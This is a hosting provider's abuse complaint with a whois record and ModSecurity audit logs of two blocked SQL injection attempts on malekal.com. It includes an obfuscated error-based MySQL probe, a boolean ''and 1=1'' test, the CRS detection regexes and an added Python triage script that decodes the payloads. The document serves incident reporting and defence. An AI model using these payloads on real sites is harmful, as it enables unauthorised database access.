- We have received the abuse complaint regarding the ATTACK. Please check it and take the necessary actions on it.
- Thanks.
- ==========================================================
- ed e-mail to inform you of an abuse complaint **
- ABUSE TYPE: ATTACK
- IP: 85.17.73.12
- Dear customer,
- This message is to inform you we received a complaint regarding
- an IP assigned to you. Please see the complaint at the bottom
- of this e-mail. We urge you to take appropriate action to prevent
- future complaints.
- Please note: the complaint has been processed by an automated system.
- If you feel the complaint is invalid, please contact the complainant.
- Failure to take action might result in an IP block of the mentioned IP.
- Kind regards,
- LeaseWeb Netherlands B.V. - Abuse Desk
- ***** ADDITIONAL INFORMATION BY SIRT *****
- ******************************************
- ORIGINAL COMPLAINT BELOW
- ******************************************
- Hello,
- This is an automatically generated email,
- === Fri, 29 May 2015 20:38:50 +0200
- 9 attacks from 85.17.73.12 have been detected against malekal.com (94.23.44.69)
- More abuses for WYCT at : http://www.malekal.com/modsec/index.php?netname=WYCT
- abuse mail : abuse@leaseweb.com
- ===
- % This is the RIPE Database query service.
- % The objects are in RPSL format.
- %
- % The RIPE Database is subject to Terms and Conditions.
- % See http://www.ripe.net/db/support/db-terms-conditions.pdf
- % Note: this output has been filtered.
- % To receive output for a database update, use the "-B" flag.
- % Information related to '85.17.73.0 - 85.17.73.63'
- % Abuse contact for '85.17.73.0 - 85.17.73.63' is 'abuse@leaseweb.com'
- inetnum: 85.17.73.0 - 85.17.73.63
- netname: WYCT
- descr: Aysima 1-10-2009
- remarks: Please send email to "abuse@leaseweb.com" for complaints
- remarks: regarding portscans, DoS attacks and spam.
- country: NL
- admin-c: LSW1-RIPE
- tech-c: LSW1-RIPE
- status: ASSIGNED PA
- mnt-by: OCOM-MNT
- created: 2011-11-01T11:27:42Z
- last-modified: 2011-11-01T11:27:42Z
- source: RIPE # Filtered
- person: RIP Mean
- address: P.O. Box 93054
- address: 1090BB AMSTERDAM
- address: Netherlands
- phone: +31 20 3162880
- fax-no: +31 20 3162890
- abuse-mailbox: abuse@nl.leaseweb.com
- nic-hdl: LSW1-RIPE
- mnt-by: OCOM-MNT
- created: 2005-06-07T14:36:03Z
- last-modified: 2015-03-24T09:01:24Z
- source: RIPE # Filtered
- % Information related to '85.17.0.0/16AS16265'
- route: 85.17.0.0/16
- descr: LEASEWEB
- origin: AS16265
- remarks: LeaseWeb
- mnt-by: OCOM-MNT
- created: 2005-03-12T22:19:17Z
- last-modified: 2007-07-10T14:06:02Z
- source: RIPE # Filtered
- % Information related to '85.17.0.0/16AS60781'
- route: 85.17.0.0/16
- descr: LEASEWEB
- origin: AS60781
- remarks: LeaseWeb
- mnt-by: OCOM-MNT
- created: 2014-03-11T15:21:15Z
- last-modified: 2014-03-11T15:21:15Z
- source: RIPE # Filtered
- % This query was served by the RIPE Database Query Service version 1.79.2 (DB-4)
- Some logs for 85.17.73.12
- ========================================
- Matched Transaction for Search String (85.17.73.12)
- ========================================
- ========================================
- Matched Transaction for Search String (29/May/2015)
- ========================================
- --838f666c-A--
- [29/May/2015:20:34:53 +0200] VWixTV4XLEUAACR1eK4AAAAB 94.23.44.69 7399 94.23.44.69 8080
- --838f666c-B--
- POST /modsec/index.php?ip=(%2f**%2fsElEcT+1+%2f**%2ffRoM(%2f**%2fsElEcT+count(*),%2f**%2fcOnCaT((%2f**%2fsElEcT(%2f**%2fsElEcT+%2f**%2fuNhEx(%2f**%2fhEx(%2f**%2fcOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21))))+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2flImIt+0,1),floor(rand(0)*2))x+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2fgRoUp%2f**%2fbY+x)a) HTTP/1.1
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
- Referer: http://www.malekal.com/modsec/index.php?ip=(%2f**%2fsElEcT+1+%2f**%2ffRoM(%2f**%2fsElEcT+count(*),%2f**%2fcOnCaT((%2f**%2fsElEcT(%2f**%2fsElEcT+%2f**%2fuNhEx(%2f**%2fhEx(%2f**%2fcOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21))))+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2flImIt+0,1),floor(rand(0)*2))x+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2fgRoUp%2f**%2fbY+x)a)
- Content-Type: application/x-www-form-urlencoded
- Host: www.malekal.com
- Content-Length: 0
- X-Forwarded-For: 85.17.73.12
- Accept-Encoding: gzip
- X-Varnish: 2014342074
- --838f666c-C--
- --838f666c-F--
- HTTP/1.1 403 Forbidden
- Vary: Accept-Encoding
- Content-Encoding: gzip
- Content-Length: 186
- Content-Type: text/html; charset=iso-8859-1
- --838f666c-E--
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>403 Forbidden</title>
- </head><body>
- <h1>Forbidden</h1>
- <p>You don't have permission to access /modsec/index.php
- on this server.</p>
- </body></html>
- --838f666c-H--
- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\A|[^\\d])0x[a-f\\d]{3,}[a-f\\d]*)+" at ARGS:ip. [file "/etc/modsecurity/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21 found within ARGS:ip: (/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT /**/uNhEx(/**/hEx(/**/cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21)))) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a)"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"]
- Action: Intercepted (phase 2)
- Apache-Handler: application/x-httpd-php
- Stopwatch: 1432924493439313 2606 (- - -)
- Stopwatch2: 1432924493439313 2606; combined=515, p1=131, p2=185, p3=0, p4=0, p5=169, sr=29, sw=30, l=0, gc=0
- Response-Body-Transformed: Dechunked
- Producer: ModSecurity for Apache/2.6.6 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
- Server: Apache/2.2.22
- --838f666c-Z--
- ========================================
- Matched Transaction for Search String (85.17.73.12)
- ========================================
- ========================================
- Matched Transaction for Search String (29/May/2015)
- ========================================
- --838f666c-A--
- [29/May/2015:20:34:53 +0200] VWixTV4XLEUAACR1eK8AAAAB 94.23.44.69 7399 94.23.44.69 8080
- --838f666c-B--
- POST /modsec/index.php?ip='0=A+and+1=1 HTTP/1.1
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
- Referer: http://www.malekal.com/modsec/index.php?ip='0=A+and+1=1
- Content-Type: application/x-www-form-urlencoded
- Host: www.malekal.com
- Content-Length: 0
- X-Forwarded-For: 85.17.73.12
- Accept-Encoding: gzip
- X-Varnish: 2014342075
- --838f666c-C--
- --838f666c-F--
- HTTP/1.1 403 Forbidden
- Vary: Accept-Encoding
- Content-Encoding: gzip
- Content-Length: 186
- Content-Type: text/html; charset=iso-8859-1
- --838f666c-E--
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>403 Forbidden</title>
- </head><body>
- <h1>Forbidden</h1>
- <p>You don't have permission to access /modsec/index.php
- on this server.</p>
- </body></html>
- --838f666c-H--
- Message: Access denied with code 403 (phase 2). Pattern match "(?i)\\b(?i:and)\\b\\s+(\\d{1,10}|'[^=]{1,10}')\\s*?[=]|\\b(?i:and)\\b\\s+(\\d{1,10}|'[^=]{1,10}')\\s*?[<>]|\\band\\b ?(?:\\d{1,10}|[\\'\"][^=]{1,10}[\\'\"]) ?[=<>]+|\\b(?i:and)\\b\\s+(\\d{1,10}|'[^=]{1,10}')" at ARGS:ip. [file "/etc/modsecurity/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: and 1= found within ARGS:ip: '0=A and 1=1"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"]
- Action: Intercepted (phase 2)
- Apache-Handler: application/x-httpd-php
- Stopwatch: 1432924493554446 2160 (- - -)
- Stopwatch2: 1432924493554446 2160; combined=381, p1=120, p2=112, p3=0, p4=0, p5=113, sr=30, sw=36, l=0, gc=0
- Response-Body-Transformed: Dechunked
- Producer: ModSecurity for Apache/2.6.6 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
- Server: Apache/2.2.22
- --838f666c-Z--
- ========================================
- Matched Transaction for Search String (85.17.73.12)
- ========================================
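As an added example (not part of the complaint, of the malekal.com script, or of ModSecurity itself), the Python below re-creates what the "Some logs" section shows: it takes the two blocked request lines above as constructed sample input, URL-decodes ARGS:ip the way the CRS rules see it, re-runs the two regexes quoted in the H sections (981260 and 959072) and decodes the 0x... literals in the first payload. The regexes are copied from the log with ModSecurity's doubled backslashes undone; the rest of the CRS transformation chain is not reproduced. The trusted-proxy address used to decide whether to believe X-Forwarded-For is an assumption taken from the remote address in the A sections.

```python
"""Re-check the two blocked requests from the audit log against the CRS 2.2.8
regexes quoted in the log, and decode the obfuscated first payload.
Added example, not ModSecurity code; sample data copied from the page."""
import re
from urllib.parse import parse_qsl, urlsplit

# Assumption: X-Forwarded-For is only believed when the TCP peer is the site's
# own Varnish front end (the remote address seen in both A sections).
TRUSTED_PROXIES = {"94.23.44.69"}

# Constructed sample built from the two audit-log transactions on this page.
SAMPLE_TRANSACTIONS = [
    {
        "id": "VWixTV4XLEUAACR1eK4AAAAB",
        "remote_addr": "94.23.44.69",
        "x_forwarded_for": "85.17.73.12",
        "request_line": (
            "POST /modsec/index.php?ip=(%2f**%2fsElEcT+1+%2f**%2ffRoM(%2f**%2fsElEcT"
            "+count(*),%2f**%2fcOnCaT((%2f**%2fsElEcT(%2f**%2fsElEcT+%2f**%2fuNhEx("
            "%2f**%2fhEx(%2f**%2fcOnCaT(0x217e21,0x4142433134355a5136324457514146504f"
            "4959434644,0x217e21))))+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+"
            "%2f**%2flImIt+0,1),floor(rand(0)*2))x+%2f**%2ffRoM+information_schema."
            "%2f**%2ftAbLeS+%2f**%2fgRoUp%2f**%2fbY+x)a) HTTP/1.1"
        ),
    },
    {
        "id": "VWixTV4XLEUAACR1eK8AAAAB",
        "remote_addr": "94.23.44.69",
        "x_forwarded_for": "85.17.73.12",
        "request_line": "POST /modsec/index.php?ip='0=A+and+1=1 HTTP/1.1",
    },
]

# The two CRS rules from the H sections, backslashes unescaped.
CRS_RULES = {
    "981260": ("SQL Hex Encoding Identified",
               re.compile(r"(?i:(?:\A|[^\d])0x[a-f\d]{3,}[a-f\d]*)+")),
    "959072": ("SQL Injection Attack",
               re.compile(r"(?i)\b(?i:and)\b\s+(\d{1,10}|'[^=]{1,10}')\s*?[=]"
                          r"|\b(?i:and)\b\s+(\d{1,10}|'[^=]{1,10}')\s*?[<>]"
                          r"|\band\b ?(?:\d{1,10}|['\"][^=]{1,10}['\"]) ?[=<>]+"
                          r"|\b(?i:and)\b\s+(\d{1,10}|'[^=]{1,10}')")),
}


def parse_request_line(request_line):
    """Split 'METHOD target HTTP/x' and URL-decode the query into {name: value}."""
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    return method, parts.path, dict(parse_qsl(parts.query, keep_blank_values=True))


def normalize_sql(value):
    """Undo the evasions in the first payload: /**/ used as whitespace and
    random keyword casing. Case folding only, no SQL parsing."""
    value = re.sub(r"/\*.*?\*/", " ", value)
    return re.sub(r"\s+", " ", value).strip().lower()


def decode_hex_literals(value):
    """MySQL reads 0x41... as a string literal; return each one as text."""
    out = []
    for h in re.findall(r"0x([0-9a-fA-F]+)", value):
        if len(h) % 2 == 0:
            out.append(bytes.fromhex(h).decode("ascii", "replace"))
    return out


def match_crs_rules(args):
    """Run the quoted regexes over each decoded argument (the rules target ARGS
    after t:urlDecodeUni); return [(rule_id, arg_name, matched_data)]."""
    hits = []
    for name, value in args.items():
        for rule_id, (_msg, rx) in CRS_RULES.items():
            m = rx.search(value)
            if m:
                hits.append((rule_id, name, m.group(0)))
    return hits


def triage(tx):
    """Summarize one transaction: who sent it, which rule fired, what the
    payload actually contained once decoded."""
    _method, path, args = parse_request_line(tx["request_line"])
    hits = match_crs_rules(args)
    trusted = tx["remote_addr"] in TRUSTED_PROXIES
    return {
        "id": tx["id"],
        # A client reaching Apache directly could forge X-Forwarded-For.
        "client_ip": tx["x_forwarded_for"] if trusted else tx["remote_addr"],
        "path": path,
        "rule_ids": sorted({h[0] for h in hits}),
        "matched_data": [h[2] for h in hits],
        "normalized_sql": {k: normalize_sql(v) for k, v in args.items()},
        "hex_strings": [s for v in args.values() for s in decode_hex_literals(v)],
    }


if __name__ == "__main__":
    for tx in SAMPLE_TRANSACTIONS:
        r = triage(tx)
        print(r["id"], r["client_ip"], r["rule_ids"], r["matched_data"])
        print("  hex literals:", r["hex_strings"])
        print("  normalized:  ", r["normalized_sql"]["ip"])
```

Decoded, the first payload is the MySQL floor(rand(0)*2) ... GROUP BY duplicate-key probe: the inner concat() wraps a marker, !~!ABC145ZQ62DWQAFPOIYCFD!~!, that an automated tool expects to read back out of a "Duplicate entry" error, and the /**/ and mixed case are keyword-filter evasions. The rule that stopped it keyed on the hex literals, which the obfuscation left untouched. Note also that in both transactions the TCP peer is 94.23.44.69 and the complained-about address exists only in X-Forwarded-For, so the attribution to 85.17.73.12 is only as reliable as the proxy that set that header.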